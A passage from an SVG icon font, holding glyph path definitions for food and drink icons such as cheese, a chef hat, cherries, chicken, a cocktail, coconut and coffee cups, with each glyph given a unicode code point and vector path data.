6-11 10-18 13 26 12 54 26 78l3-1c-3-13-7-26-10-40 8 3 13 5 19 8l2-4c-5-3-9-7-14-10-3-3-9-5-10-8-5-11-8-22-12-33 11 6 21 11 32 17l3-5c-3-1-6-3-9-4-9-5-18-10-28-16z m-516 28c0 7-6 9-9 14-6 9-9 19-14 28-1 2-4 4-6 4-16 2-17 3-19 18 0 3-3 8-5 8-14-1-26 5-35 15-1 1-3 1-4 2-9 3-13 1-11-8 2-17 7-33 10-50l0 0c0 0 0 0 1 0l0 0v0c6 12 15 2 24 2-4 11-9 22-13 34l2 1c10-17 20-34 30-52l2 2 2 17 4 0c1-7 1-14 2-20 2-7 4-15 9-20 11-11 23-21 34-31 0 3-1 8-2 12 0 8-1 16-2 24z m-16 18c0-10 1-19 2-30-12 6-12 24-2 30z m560 222c-4-1-9-1-15-2 6-10 12-20 17-29 2-3 3-7 3-11-1-7-2-14-3-21 0-2-1-6 1-6 6-4 4-10 4-15v-10c5 2 9 3 12 5 3 3 7 7 8 10 1 7 0 15 0 22 0 4-1 8 5 11 3 1 6 6 1 11-2 2-4 7-2 9 6 7 3 12-2 15 0 7 0 11 0 16 1 5 2 10 1 15 0 2-2 3-4 5-2 1-4 3-6 4 6 12 6 12 1 16-1-3-1-6-2-9-4-10-9-21-14-32-1-2-3-3-5-4z m-37-342c-7 10-15 15-26 14-12-1-22-5-26-17 4-3 8-5 11-8 5-4 9-4 14-1 4 2 9 2 14 3l1-4c-6-2-12-4-19-6 9-9 18-17 26-25-6-5-11-4-19 4-5 5-10 11-16 18-4-11-7-21-11-30l-3 1c2 7 4 14 7 20 4 12 4 12-6 21-5-7-9-13-14-19-6-7-12-14-17-20 10-9 18-12 30-10 3 1 7-1 10-3 15-10 29-7 44 0 8 5 14 15 12 24-2 13-4 26-12 38z m-68 102c1 1 3 3 4 3 12 0 13 9 15 18 1 3 3 5 5 7 2-3 5-6 4-8-2-6-5-13-9-19-2-4-4-8-7-13h12c8 19 12 24 27 37 3 3 9 5 11 9 10 12 8 28 10 43 1 3 3 9 5 9 7 0 9 6 11 11 2 7 4 15 7 22 3 7 8 14 11 21 1 2 0 4 0 6 0 3-1 7 0 10 2 7 2 11-8 9 2 5 4 8 6 13-6 0-8 2-6 7 2 4 4 8 4 13 0 2-3 7-3 7-9-1-7 4-8 8 0 5 0 12-3 15-8 6-8 13-5 21h12c4 4 7 6 10 9 2 2 5 5 5 6-5 6 0 8 4 12 1 1 1 3 2 4-3 2-5 4-8 6 3 2 5 4 7 6 1 2 3 4 4 6-1 1-3 3-5 4-5 1-6 3-4 8 4 12 3 14-9 19 0 4-1 9-1 13h-9c-1 5-2 9-2 13-9-1-12 7-18 10-6 3-13 6-20 9l1 4c4-2 8-3 12-4 8 6 10 13 6 23-1 2 1 5 1 8l3 0c2-5 4-9 6-14 7 5 14 10 22 15 1 1 4-1 6-1-1-2-1-5-3-5-7-3-8-9-9-16 0 0 0-1-1-1-2 1-3 3-4 4-3-1-5-3-7-5 8-3 14-6 21-9l-1-3c-6 1-11 2-16 4-11 3-11 3-14-1 5-12 24-8 24-23 4-2 8-4 11-6 11 11 12 24 9 38-3 10-4 19-5 27-18 2-36 4-55 5-1-3-1-6-2-10-5 7-10 13-15 19 0 1 2 2 2 3 1 7 2 14 3 21l-2 8c0 9-3 12-13 12-1-1-3 0-4 1 1 14 0 15-13 9-1 0-5 2-6 4-3 4-3 8-5 13-11-7-11-6-15 5-1 2-6 5-7 4-7-3-9 0-11 6-2 7-6 8-11 2-4-3-7-3-9 2-3 9-9 8-16 4-2-2-7-3-8-2-9 9-15 3-23-1-6-4-13-5-19-7 0 1 0 1-1 2 2 3 3 6 6 11-5 0-8 1-11 0-5-3-7-1-10 4-1 2-5 4-6 4-10-5-18 2-26 4l7 2c1 1 1 2 1 3-3 1-7 4-10 4-5-2-9 0-12 4-3 5-8 7-14 3-4-3-7-1-10 4-1 3-7 4-11 5-3 0-7-1-11-2-2 9-8 8-15 6-4-1-8-1-11-1-7 1-12-2-14-8-2-6 0-11 8-12-12-6-12-6-16 7-6 3-11 4-15 7-8 4-15 4-23-1-8-4-15-9-24-11-8-2-10-8-15-14-4-5-16-5-18-10-4-11-14-16-22-23-3-2-5-4-8-5-1 3 0 6 1 8 1 3 3 6 5 10-7 0-13 1-19 0-11 0-18-9-22-20-4-12-9-25-26-27-7-1-14-7-21-11-1-1-4-4-3-6 2-7-3-8-8-9-8-2-12-8-14-16-1-4-3-8-6-12-2-6-6-11-8-17-4-11-7-23-10-34 0-1 0-1-1-2-14-8-12-20-10-33 2-7 6-12 14-9-1 9-2 17 7 23 1 1 1 3 2 4 1 9 6 14 13 18 4 2 8 6 10 10 10 15 39 24 56 15-5-1-8-2-11-2-13-1-24-4-34-12-2-2-5-5-4-7 2-6-2-6-6-7-12-3-15-8-17-21 0-2-1-4-2-5-10-2-7-8-6-15 1-4 0-7-6-6-16 2-28-11-27-28 1-2 0-5-1-7-6-7-9-15-5-20-2-9-5-15-6-21 0-6 4-12 5-19 1-6 2-11 11-10 2 0 6-1 7-3 5-10 15-14 25-9 8 4 14 7 21 3 5 4 8 7 12 10 1-1 1-1 2-2-2-5-4-9-6-13-2-2-7-4-8-3-7 5-13 4-20 0-3-2-6-3-9-3-13-3-21-14-16-25 2-7 1-11-2-17-2-6-2-11 6-12 5-2 7-4 4-9-2-5 1-8 5-10 6-3 11-6 15-13 3-6 10-12 17-14 12-2 15-10 17-20 0-3 4-6 7-6 10 1 14-3 16-12 1-2 2-4 4-9 0 8-1 14-1 19-14 5-20 14-18 28 1 2 0 4 0 7 0 6 0 13 0 19 0 4 2 7 1 10-2 10 4 18 13 20-11-10-11-11-5-25 1-2 0-6-1-9-3-4-4-8 1-11 5-3 3-6 1-9-5-8-1-18 7-20 3-1 7-1 12-1-8-14-2-26 7-38-1 0-1-1-2-2-3 1-5 2-11 3 5-6 11-9 13-14 3-10 6-21 5-31-1-16 9-25 21-33 5-3 12-6 17-5 7 1 9-1 10-6 0-6 3-7 8-7 6 0 12 1 17-1 8-4 13-3 18 4 12-10 12-10 23 2 1 1 2 3 4 3 1 1 24-10 24-12 4-11 9-15 20-13 5 1 7 0 10-4 2-3 7-5 10-8 2 4 6 6 7 10 5 14 14 22 29 24 19 2 38 3 57 5 17 1 34 0 49-10 12-7 26-8 39-1 3 1 6 2 9 2 9-1 17-2 15 11 8 7 12 16 17 25 3 7 5 13 5 20l1 2c-3 0-6 0-9 1l-2 2c4 2 10 6 11 4 8-6 13-4 17 4z m26 66c-5 2-7 4-10 5 2 3 3 5 6 8 3 3 6 6 11 9 6-19-3-34-9-49-3-6-9-9-16-8-1 0-3 2-4 3 0 1 1 4 2 4 15 4 11 20 20 28z m-104 364c10-3 20-7 29-13 8-4 13-37 8-45 0 0-1-1-3-2-2 12-3 22-6 33-1 6-3 12-12 10-1 0-4 2-5 3-10 11-10 11-24 7 1 7 5 10 13 7z m-73-64h-17l0-1c2-1 3-2 4-5 1-4-2-10-7-10 0-1-1-1-1-1-1 0-1 0-1 0l0 0c-1 0-2-1-2-1 0-1-1-1-1-2l-1-1c-1-1-1-2-2-3l-2-4c-3-4-8-6-12-3-5 2-6 8-4 12 4 5 7 12 12 16-8 0-17 2-26 2-5 1-9 4-9 9 0 5 4 10 9 9 12-1 24-3 36-3 4 0 6-2 7-4h17c6 0 6-10 0-10z m-28-189c-2 2 0 8 0 12h3c-3-11 16-21 1-33 2 8 3 15-4 21z m-31 53c-11-12-27-18-43-21-6-1-8 9-2 10 3 0 6 1 9 1-1 1-1 1-1 2v7c0 3 3 5 5 5 3 0 5-3 5-5v-6c7 3 13 7 18 12 10 10 12 23 8 37-1 6 8 8 10 2 4-15 1-31-9-44z m7-153c-11-7-25-6-32 3 10-1 20-2 32-3z m-98 267c5 7 10 6 15 2 5-4 9-7 13-11 2-2 4-4 4-6 1-9 6-14 16-15l-19-9c1 20-8 33-29 39z m51-239c-11-3-19 4-19 18 7-7 13-13 19-18z m-124 326c7 7 17 7 26 7 3 0 6-1 7 1 8 8 19 11 28 16 10 5 20 4 32 0-15 13-14 25 0 37 3 3 3 7 6 10 1 2 3 2 5 4 1-2 2-5 1-6-2-7-2-14-11-17-6-2-5-11 0-19 6 1 11 3 15 2 11-3 19 1 28 5 14 5 28 11 42 15 6 2 14-1 21-2 2 0 3-2 5-2 9 0 12-6 14-13 2-10 3-21 4-31 1-2-1-4-3-7-2 2-4 2-4 4-1 9-3 18-4 27-1 6 0 13-10 12 0 0-2 0-2 1-11 10-19 5-26-2-20 1-36-6-50-18-6 7-15 5-23 4-3-1-4-8-7-15-2 1-7 2-11 3-4 0-10 3-12 1-10-10-27-5-35-19 0-1-5-1-7-1-14 1-24-1-29-17-4-9-11-3-17-2 6 8 11 15 17 22z m9-94c0-3 0-6 0-9-1-6-10-6-10 0 1 18 2 43 24 49 6 1 8-8 2-9-9-3-13-11-15-21 8-5 15-10 19-19 1-2-2-5-4-5-2-1-5 0-6 3-1 4-5 8-10 11z m4-23c-7-7-10-16-10-26 0-6-10-6-10 0 0 12 5 23 14 32 4 5 11-2 6-6z m-39-120c-1 3-3 6-5 10 4 4 6 6 11-1 4-7 5-13 2-20 0-5 0-10 1-16 2-2 6-6 9-9l-1-1c-5 1-11 3-16 3-5 0-10-4-17-4 5 4 10 8 13 11 4 6 7 11 10 16-2 4-4 7-7 11z m-22 106c-3-7-5-14-7-21-1-2-2-6-4-6-9 0-7-7-7-13 0-3-1-6-2-9-2-8 1-14 8-19-11-4-19 3-17 17 0 8 2 15 4 23 0 1 0 1 1 2 5 11 11 21 17 31 3 6 4 12 7 17l3 0c3-8 1-15-3-22z m3 138c4-10 7-17 10-25-8 0-12 9-10 25z m22-412c-15-9-15-9-20-6 6 4 13 8 20 12 4-3 10-8 16-11 6-3 13-4 17 5 12-6 21-1 29 8 3 2 7 4 10 4 10-1 17 3 21 12 2 3 5 4 7 6 1-3 2-7 1-9-5-11-13-18-26-18-3 0-6-1-9-3-8-6-16-11-28-8-3 0-6-3-10-3-11-2-21 2-28 11z m232-34c-5 8-10 16-15 24 9 2 17-10 17-23l-2-1z m28-36c-6-2-13-1-15 9 4-1 7-2 10-2 3 1 6 3 9 4 5 1 10 3 15 4 1-1 1-2 1-3-7-4-13-9-20-12z m101 252c-2 1-5 1-5 2-5 10-10 4-15 2-5-2-10-5-14-7-2-2-6-6-5-7 2-7-3-8-7-11-6-3-13-7-6-16 0-1 0-5-1-6-7-5-3-8 2-11 3-2 7-4 10-6 0-1-1-2-1-3-4 0-9-1-12 1-11 4-22 2-30-6-1-2-2-4-2-6 0-12 1-24 1-36-1-5-3-11-6-13-7-5-6-9-4-15 1-5 2-10 3-15l-2-1c-2 2-4 4-7 7-11-9-23-14-37-15-3 0-6-4-7-6-2-5-2-9-3-14-4-10-9-14-20-13-10 1-23-7-26-17-1-2-1-4-1-5 0-5 0-10 0-16 3-3 10-7 1-13 3-4 5-8 9-10 3-3 8-5 12-8-17-4-28 6-27 22 0 6 1 12-1 18-3 11 3 19 9 27-4 2-8 4-11 6-3-10-6-20-10-29 0-1-2-3-3-3-15-6-27-17-45-14-10 1-21-4-31-6-4-1-9-3-13-2-9 2-18 5-26 8-8 2-11 7-12 17 3-3 6-5 8-6 5-2 10-4 15-6 4-1 9-2 13-2 4-1 9-2 10 0 6 6 12 8 20 3 1 0 4 1 7 1-3 10-19 18-5 32-2-10 1-16 8-19 3-2 6-4 7-6 3-11 12-10 21-9-2 16 15 7 19 16-6 4-7 6 2 10 3 1 5 6 6 10 1 3-3 7-5 8-7 5-15 8-23 12-10 6-16 12-15 26 1 6-3 15-8 19-10 10-6 20-1 30-11 5-18 12-16 24 0 2 6 4 11 8-7-18 8-19 14-25-3-9-6-17-9-27 13 1 13-5 12-13 0-2 1-6 3-8 3-5 8-8 6-16-2-8 14-13 24-8 2-16 12-17 24-13 3-9 15-13 20-7 6 7 10 5 17-1 2 8 5 14 5 20 1 10 5 13 15 13 7 0 14 0 19 3 6 3 11 9 15 14 2 3-1 9-2 16 5 3 18 0 15 14-1 3-4 5-7 10 1 6 20 17-5 23 2 3 4 5 6 6 11 1 12 8 12 17-1 8-4 14-13 14 0 4 1 9-1 12-2 4-5 9-9 11-7 4-7 5 0 11 12-17 28-32 30-55 4 1 9 3 13 4 1 12-1 24 7 34 5 5 12 7 13 16 1 6 31 20 37 18 3-2 6-6 9-10 1 0-1-2-1-4z m-31 37c-2 4-3 6-8 4-5-2-7 0-8 5-1 4-4 7-6 10 0 0 1 1 2 1 8-6 17-12 25-18 2-1 4-3 6-4 2-3 4-6 4-9 0-2-2-5-4-8l-2 2c0 1 0 3 0 3-3 6-7 9-9 14z m49-6c-9 5-13-1-16-7-1-1-3-3-6-6 0 5-1 9 1 10 7 6 7 16 15 21 3 2 3 8 6 12 3 5 2 8-1 13-1 1 0 5 0 8 1 3 4 6 3 8-6 13-5 27-6 40 0 2-3 5-5 6-3 1-8 1-11 3-9 7-19 4-27 0-9-3-16-11-24-17-2-2-4-4-6-6l-3 2c4 6 6 12 11 16 11 10 25 16 40 15 3 0 7 0 9-2 4-8 9-5 13 0 4 4 6 11 15 7 2 0 6 5 9 7-1-7 0-17-12-15-2 0-4-3-5-3 8-31 13-61 7-93 6 2 10 4 15 5 3 1 6 0 8 0 0-2 0-5-1-7-3-8-7-11-15-6-1 0-6-4-8-6-2-2-6-5-6-5z m-90-407c5 17 23 18 34 29-3 2-4 3-6 3-2 1-4 2-6 2l-55-1c-4 0-9 0-14 0l0 4c17 8 36 3 52 5-6 9-13 19-19 29-7-5-15-12-23-18-7-5-14-8-15-18 0-2-3-5-5-7-5-4-10-8-14-12 8-4 16-7 22-12 21-16 44-20 71-17 26 4 43 20 60 38 2 3 3 8 4 11-15-3-32-5-46-10-14-6-26-17-40-26z m-139 58c-6 5-10 10-15 13-2 2-4 2-6 2-12-1-21 4-24 17-6 1-14 4-16 2-15-14-32-5-48-6-4-6-8-13-12-20-11-17-5-47 12-53 16-6 33-7 50-10-7 18-14 33-20 49l-20-21-2 2c2 4 4 9 7 12 8 10 19 17 20 31 0 2 2 4 4 6 0-5-1-10-1-16-1-20 8-37 17-54 2-4 3-8 5-15 16-7 34-11 51-5 1 12 2 23 2 33 0 1 0 3-1 4-7 9-6 20-3 29z m-69-2c22-7 37-15 40-22-18 0-32 7-40 22z m9-26c13-4 24-6 36-10-13-6-27-3-36 10z m245 55c-17-4-34-2-49 6-7 4-15 6-23 8-13 2-25 1-32-13l15-9-2-3c-3 1-7 1-10 3-10 4-11 4-15-5 4-4 7-8 11-12l-2-2c-5 3-9 5-15 9l-22-39c-6 10 2 19 4 28-6-1-12-1-18-2l-1 4c6 1 13 2 19 5 5 3 9 8 14 12l-1 2-28-6-2 3c2 2 4 5 6 5 8 2 17 3 25 5 3 0 6 1 8 2 3 3 6 6 11 10-10 0-17 0-25-1-8-1-16-2-24-6-6-3-13-7-9-17 1-1 0-5-1-5-10-5-10-13-10-21 0-8 1-15 2-22 0-8 0-17 1-25 2-10 3-10 12-4 4 3 9 5 14 5 9 0 14 4 13 12 0 6 2 8 7 9 3 2 6 4 9 6 8 6 16 11 17 22 0 1 2 1 3 2 11 11 23 22 35 33 1 2 5 3 6 2 2-1 2-4 2-6 0-3-1-6-1-8 8-16 19-28 37-31v24l2 0c4-10 9-20 14-32 15 4 29 8 45 12-1 8 1 18-3 24-10 18-19 20-39 16z m-491 160l2 3c-2 2-4 4-5 5-5 4-11 6-15 10-17 15-33 31-49 46-13 13-15 13-28-1-2-3-4-5-5-8-5-7-5-15 3-19 23-11 46-22 69-31 9-4 19-3 28-5z m3-17c-1 2-4 7-6 7-14 0-29 0-43-1-4-1-11-6-13-10-9-19 1-41 20-48 14-6 27-12 41-16 8-3 17-4 26-7-4 10-8 16-10 23-6 17-10 35-15 52z m-13-39c-14 10-27 20-47 15 12 16 48 5 60-18-5 1-10 0-13 3z m25 88c-6 6-11 11-20 8-5-1-10-3-14 4 4 1 8 1 12 2-5 6-9 11-12 15-7-2-13-4-19-4-1-1-4 3-6 5 3 1 5 3 7 3 4 1 9 1 13 1-3 5-5 10-7 14-11-3-22-5-34-7 20-16 38-32 57-48 4-3 11-5 15-4 10 3 19 0 29-3-4 2-7 4-10 6-4 3-8 5-11 8z m244-293c-8 8-17 15-29 13-4 0-7 0-11 0-18 1-34 9-42 26-9 18-7 35 4 51 3 5 6 9 10 14-12 3-16 3-17-3-4-12-8-24-11-37-3-16-1-31 14-42 8-7 16-15 24-23 2-1 3-4 5-5 9-9 18-19 28-27 2-2 6-3 9-3 24 1 39 21 60 30-12 2-24 2-36 3-3 0-6 1-8 3z m-104 101c-13-2-28 1-39-4-27-12-52-28-78-42l3-4c1-1 2-2 4-3 31-20 64-25 99-13 13 4 16 24 7 34-3 3-4 8-6 12l3 2c3-3 6-6 9-10 3 10 6 20 9 30-4-1-8-2-11-2z m-20-49l-3 0c-1 3-3 6-4 9-12-1-7-15-13-20l0 3c-5 1-10 3-15 3-11-1-22-3-33-4-3-1-7 0-12 0 8 12 20 7 30 10-3 3-5 4-8 6l1 2c14-1 29-13 42 3-1 1-3 2-7 4 9 2 17 3 24 5-1-6-1-13-2-21z" />
<glyph glyph-name="cheese" horiz-adv-x="1000" unicode="&#xeb4d;" d="M63 232c0 69-1 139 0 209 0 12 4 26 9 38 48 118 133 197 254 238 4 1 10 0 15-2 133-58 265-117 398-175 64-28 127-56 191-84 6-3 8-6 8-12-1-29-1-58 0-88 0-6-2-9-8-11-17-5-32-14-44-27-22-22-23-52-2-75 13-13 28-22 46-28 5-2 8-5 8-11-1-40 0-80-1-120 0-22-14-36-36-38l-214-17-162-12c-61-5-123-11-185-15-62-5-124-10-186-15-18-1-37-2-55-4-22-2-36 11-36 33v216z m296 417c-8 3-16 7-24 10-4 2-8 1-11 0-74-29-132-76-174-143-1-1-2-3-2-4-2-3 39-5 90-5h349c51 0 88 2 82 5-4 2-7 3-11 5-53 23-107 47-160 70-3 2-8 3-10 1-14-12-31-16-49-18-25-3-49 0-70 15-17 13-17 30-1 43 3 2 5 3 8 5 4 3-4 10-17 16z m121-532c0-46 36-83 82-83 45 0 82 36 82 82 0 46-37 83-82 83-45 1-82-36-82-82z m-184 135c4 0 8 1 12 2 56 15 78 78 40 120-32 35-91 36-125 3-18-17-26-38-21-63 3-19 14-35 29-46 25-19 58-17 65-16z m316 200h-48c-21 0-24-2-25-24v-2c-1-38 30-69 71-70 49-2 86 43 72 87-2 7-4 10-12 10-19-1-39-1-58-1z m149-211c-28 0-51-21-51-47 0-26 23-47 51-47 27 0 50 22 50 47-1 26-23 47-50 47z m-259 32c0 26-23 47-50 47-28 0-50-21-50-47 0-26 22-48 50-48 28 0 50 21 50 48z m-281-99c-28 1-50-19-51-46 0-26 22-47 49-47 29-1 52 20 52 47-1 25-23 46-50 46z" />
<glyph glyph-name="chef" horiz-adv-x="1000" unicode="&#xeb4e;" d="M933 452c-7 29-20 55-38 77-16 41-43 71-83 89-7 3-9 7-10 15-5 79-66 143-145 153-8 1-16 1-24 1l-36-4-14-6c-30-10-55-28-74-53-43 0-86-14-122-44-30-24-52-54-69-90-47 15-92 16-137-3-45-18-78-50-99-94-36-73-19-165 41-220 30-28 65-45 106-50 58-7 109 10 152 48 4-3 7-5 10-7 71-53 155-57 229-10 7 5 12 6 20 0 42-28 89-38 140-30 104 18 176 125 153 228z m-311-238c-79-40-156-37-232 8-6 4-10 4-15 0-27-18-57-29-88-33-10-1-12-4-12-13 1-41 1-82 0-122v-78h471v210c-40 1-77 10-111 29-3 2-9 1-13-1z m-347-251h471v-51h-471v51z" />
<glyph glyph-name="cherry" horiz-adv-x="1000" unicode="&#xeb4f;" d="M689 225c-7 1-15 2-23 2-23 0-45-4-65-10-67 110-150 279-122 400 2-12 5-24 8-36 11-34 29-62 51-85 23-23 51-41 87-52 18-5 37-8 59-9 23 0 47 2 77 13-2 22-6 41-10 60-4 18-10 35-16 51-14 31-32 57-54 79-23 23-49 41-81 54-20 7-40 14-65 17 28 23 67 40 115 50 5 0 11 0 16 0v29c-78 0-145-29-199-84-126-130-145-375-148-478-85-5-152-60-152-147 0-92 74-167 166-167s167 75 167 167c0 84-63 135-144 146-3 0-5 1-8 1 2 91 19 296 111 424l0-1c-49-133 42-322 116-444-45-24-75-68-75-126 0-92 74-166 166-166s167 74 167 166c0 84-63 135-144 146z m-190 461c41-44 171-168 171-168-128 83-181 156-181 156l10 12z" />
<glyph glyph-name="chicken-fry" horiz-adv-x="1000" unicode="&#xeb50;" d="M915 501c-61 122-226 162-368 91-72-36-124-93-150-157-2-1-3-3-4-5-17-30-51-79-97-102-14-7-22-22-17-36l33-94c5-14 21-23 36-25 26-3 76-13 173-40 2 0 4-1 6-1 72-26 160-22 241 19 142 71 208 228 147 350z m-185 28c-101 17-175-49-237-121-27-30-62-11-35 19 78 90 168 158 292 136 40-7 20-41-20-34z m-484-245l-34-10c-8 13-18 24-32 31-39 22-88 7-109-32-18-33-5-71 23-95-9-35 0-77 33-95 39-21 88-7 110 32 8 15 11 31 9 47l33 10-33 112z" />
<glyph glyph-name="chicken" horiz-adv-x="1000" unicode="&#xeb51;" d="M923 656c-13 14-33 17-50 11 6 18 3 37-11 51-19 19-50 19-69 0-10-10-14-24-13-37 3-44-22-79-41-98-51-51-207-64-207-64v0c-32-4-62-18-88-40-11-4-21 15 1 33 11 9 38 19 28 24-203-5-366-152-366-333 0-184 84-166 378-166 317 0 378-18 378 166 0 83-35 158-91 217-8-34-14-70-16-97l0-1 0 0c-7-45-26-85-57-116-39-38-90-59-144-59-48 0-91 14-128 45-19 18 4 42 26 21 7-5 14-10 22-14 2-1 3-2 5-3 6-3 13-5 19-8 4-1 8-2 12-3 5-2 10-3 15-4 9-2 19-3 28-3 20 0 39 4 58 10 23 9 46 22 64 41 28 27 43 61 48 97l1 0s13 156 64 207c19 19 55 44 100 41h1v0c12 0 24 5 33 14 19 19 19 49 0 68z m-56-660h-775c-16 0-29-4-29-8v-12c0-5 13-8 29-8h775c16 0 29 3 29 8v12c1 4-13 8-29 8z" />
<glyph glyph-name="cocktail" horiz-adv-x="1000" unicode="&#xeb52;" d="M210 554l81 61-101-18c0-4 1-12 6-23 4-10 10-18 14-20z m178-38c-22 25-43 49-64 69-2 3-4 6-6 9l-7-53-6-44c3-2 9-3 16-3 21 0 51 10 67 22z m-99-17c1 0 2 0 4 0l14 113-89-69c5-15 47-44 71-44z m352-184c5 25 33 76 71 129 38 53 85 108 127 150 5 6 7 13 4 20-3 6-9 11-16 11h-481c-8 0-14-5-17-11-3-7-1-14 4-20 42-41 89-97 127-150 37-53 66-104 71-129 10-45 13-123 13-188v-111c0-97-217-64-177-103h438c40 39-177 6-177 103v107c0 64 3 141 13 192z m-45-187v-145c0-5 2-9 6-13 1-1 11-10 30-22h-92c19 12 30 21 30 22 4 4 6 8 6 13v145c0 66 1 143-10 194-8 37-39 88-77 143-31 42-67 86-102 124l-19 20h435l-18-20c-35-38-71-82-102-124-39-55-69-106-77-143-11-56-10-130-10-194z m-414 503c0-11 2-18 5-21l107 19-99 44c-8-8-13-24-13-42z m491-159c20 28 43 57 66 85h-306c23-27 46-57 66-85 30-42 51-77 65-106 7-3 15-4 22-4 8 0 15 1 22 3 13 29 34 64 65 107z m-87-92c-2 0-4 0-5 1-4 7-10 17-17 27-5 8-11 15-17 22h79c-6-7-12-14-18-21-7-12-13-20-16-28-2-1-4-1-6-1z m-325 364c-10-2-39-23-54-44-4-6-7-12-7-16l104-45-43 105z m178-79l-73-27h80c0 11-3 21-7 27z m-43-159c-20-15-52-25-75-25-10 0-18 2-24 6-2-1-5-1-8-1-28 0-78 31-84 55-12 7-22 27-25 40-3 8-3 15-2 20-6 6-9 17-9 30 0 19 6 41 19 52-1 6 2 15 8 24 15 22 50 50 66 50 1 0 1 0 1 0 10 12 31 16 48 16 13 0 29-3 39-10 3 2 6 3 10 3 11 0 27-9 36-24 15-1 30-19 34-24 10-12 19-29 18-43 6-9 10-22 11-37h18c-2 31-13 61-32 86-27 34-64 56-107 62-43 6-85-5-119-31-71-54-84-155-31-226 26-34 64-56 107-62 7-1 14-1 22-1 32 0 63 9 89 27-3 4-7 9-10 13z m24 204c-10 12-19 18-25 19l-62-90 102 38c0 9-6 21-15 33z m-60 43c-2 0-3 0-4-1l-12-47-12-45 52 76c-6 10-17 17-24 17z m-17 0c-6 4-19 7-32 7-17 0-32-4-38-11l35-86 7-16 15 56 13 50z" />
<glyph glyph-name="coconut-water" horiz-adv-x="1000" unicode="&#xeb53;" d="M521 418c15 0 30 1 45 0 7 0 11 3 14 9l94 189c3 6 6 10 12 13 55 37 110 74 165 111-2 1-31 47-31 47-60-40-120-80-179-119-5-3-8-7-11-12-19-39-38-77-57-116-19-37-38-75-57-113-4-9-4-9 5-9z m186 123c-5 3-8 3-10-3-6-13-13-26-20-39-2-4-2-7 3-9 8-5 16-12 23-20 12-14 12-31 0-46-11-14-27-23-44-31-33-14-68-21-104-26-6-1-13-1-20-1-5-1-8-3-11-7l0-1-46-78v80c0 2-1 3-5 4-6 1-7-3-8-7-17-52-33-104-50-156-1-3-1-5-4-8v162c0 14 0 13-14 16-29 4-58 12-86 24-13 7-25 14-35 24-17 18-17 38 0 56 16 16 36 25 57 33 53 18 108 24 164 22 7 0 10 2 13 9 7 14 14 27 21 41 2 3 3 6-3 6-69 4-138 1-205-21-59-19-108-53-139-108-10-18-17-36-22-55-1-4-42-130 25-274v0c31-73 81-133 155-177 37-21 77-34 120-37 2 0 4 0 5-2h39c16 4 32 4 48 8 82 21 146 68 194 136 43 61 67 128 74 202 6 54 4 108-14 161-18 53-52 94-101 122z" />
<glyph glyph-name="coconut" horiz-adv-x="1000" unicode="&#xeb54;" d="M897 642c-7 16-18 28-34 31-28 6-56 14-84 12-60-3-121-8-180-20-139-26-273-70-398-137-41-22-80-47-113-81-21-22-32-47-21-77 17-43 30-88 53-128 84-145 211-221 386-227 20 3 45 4 70 9 272 46 444 338 321 618z m-441-525c-24 0-43 20-43 44 0 24 19 43 43 43 24 0 44-19 44-43 0-24-19-44-44-44z m172 53c-19 0-35 15-35 34 0 20 16 35 35 35 19 0 34-15 34-35 0-19-15-34-34-34z m246 436c-17-20-36-39-57-54-84-60-181-98-279-130-111-37-225-63-343-69-29 5-58 8-86 15-24 6-31 30-15 49 19 21 41 42 64 58 97 65 206 105 317 138 83 24 168 43 255 48 37 2 74-3 111-5 7-1 14-4 20-7 18-9 25-29 13-43z m-88 36c-14 3-29 3-51 5-33-5-73-9-113-17-134-27-265-68-388-129-27-13-52-31-75-51-21-18-14-40 13-44 26-4 53-5 80-2 100 11 198 36 293 71 69 25 136 55 203 85 19 9 36 23 51 38 18 18 12 37-13 44z m-18-47c-58-40-121-65-186-89-100-36-202-65-307-80-27-4-55-5-83-6-9 0-17 4-25 5l-3 6c12 10 22 22 35 28 58 28 115 58 175 81 99 38 202 66 307 82 28 4 56 4 85 5 8 0 16-4 31-7-13-11-20-19-29-25z" />
<glyph glyph-name="coffee-alt" horiz-adv-x="1000" unicode="&#xeb55;" d="M500 219c-51 0-95 25-118 60h-86l39-327h321l38 327h-76c-23-35-67-60-118-60z m-160-307h311l3 24h-316l2-24z m404 804h-17c-8 0-34 5-45 41h0c-3 17-18 31-36 31h-298c-18 0-33-14-36-31-12-36-37-41-46-41h-10c-21 0-37-17-37-38v-15c0-21 16-38 37-38l28-237h98c23 36 67 61 118 61 51 0 95-25 118-61h89l28 237h9c20 0 37 17 37 38v15c0 21-17 38-37 38z m-207-3h-75c-8 0-15 7-15 16 0 10 7 17 15 17h75c9 0 16-8 16-17 0-9-7-16-16-16z m-37-469c58 0 106 40 106 90 0 49-48 90-106 90-59 0-106-41-106-90s47-90 106-90z" />
<glyph glyph-name="coffee-cup" horiz-adv-x="1000" unicode="&#xeb56;" d="M919 542c-27 71-85 99-162 77-20-6-39-14-59-21-1 26-2 52-4 78-2 26-8 34-34 36-64 5-128 10-192 11-85 2-170 2-255 0-38-1-76-7-114-12-7-1-15-2-21-7-6-4-13-12-13-19-1-96-3-192-2-288 1-100 29-194 80-280 14-25 25-53 35-80 9-22 21-38 45-43 91-20 183-25 275-8 31 5 56 19 68 50 2 8 13 15 22 18 78 27 150 65 214 118 68 57 117 126 131 216 9 52 5 104-14 154z m-51-139c-24-121-120-202-236-229 1 4 1 7 3 10 37 96 56 196 65 298 2 16 7 31 20 40 17 11 35 23 54 28 48 13 76-5 89-53 9-31 11-62 5-94z" />
<glyph glyph-name="coffee-mug" horiz-adv-x="1000" unicode="&#xeb57;" d="M321 677c24 2 47 6 67 10 6 2 13 3 19 4 10 2 20 4 30 6l1 1c3 0 6 1 9 1 3 1 7 2 10 2-6-2-14-5-20-7-13-5-26-11-36-15l-2-1c-18-8-46-21-51-44-2-8 0-18 5-25 7-7 16-12 25-11 4 0 7 0 11 1 6 1 13 3 18 5 30 12 31 4 32 3 1-5-8-16-11-21-1-1-2-1-2-2-1-1-2-3-3-4-7-10-17-23-14-34 1-2 2-3 4-2h0c1 0 2 1 2 3-1 5 3 10 7 14 3 4 7 8 11 12 2 2 3 4 5 5l0 0c6 8 18 20 18 32-1 4-3 8-6 12-11 10-27 8-40 5l-1 0-7-2-8-1c-4-1-8-2-11-2-7 0-9 3-8 5 3 9 23 20 63 33 2 1 3 1 4 2 3 1 5 1 8 2 13 5 28 10 41 17 23 12 26 26 23 36v0l0 0c0 0 0 0 0 1-3 9-11 16-23 18-17 3-36 0-52-4l-5 0c-14-3-28-6-42-9-12-3-24-6-36-8s-24-4-34-6c-7-1-17-2-26-2-7 0-16 0-22 3-6 4-3 14 0 19 8 15 24 23 40 30 14 6 30 11 50 15 13 3 26 5 38 